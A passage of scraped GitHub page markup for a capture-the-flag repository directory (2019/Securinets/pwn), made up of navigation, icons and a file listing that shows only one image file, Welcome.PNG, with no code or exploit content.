0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> acdwas </span> <span>/</span> ctf
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>5</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>25</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/acdwas/ctf/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":124655323,"originating_url":"https://github.com/acdwas/ctf/tree/master/2019/Securinets/pwn","user_id":null}}" data-hydro-click-hmac="ac936d0a15ce84bec494376cd5e77ae8f3f876ffd4f33b0497e656b3670ec914"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/acdwas/ctf/refs" cache-key="v0:1675583418.5812821" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWNkd2FzL2N0Zg==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/acdwas/ctf/refs" cache-key="v0:1675583418.5812821" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWNkd2FzL2N0Zg==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf</span></span></span><span>/</span><span><span>2019</span></span><span>/</span><span><span>Securinets</span></span><span>/</span>pwn<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf</span></span></span><span>/</span><span><span>2019</span></span><span>/</span><span><span>Securinets</span></span><span>/</span>pwn<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/acdwas/ctf/tree-commit/773a121b9ebe30e8693ecf86a6231f1037b7b0a0/2019/Securinets/pwn" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/acdwas/ctf/file-list/master/2019/Securinets/pwn"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>Welcome.PNG</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
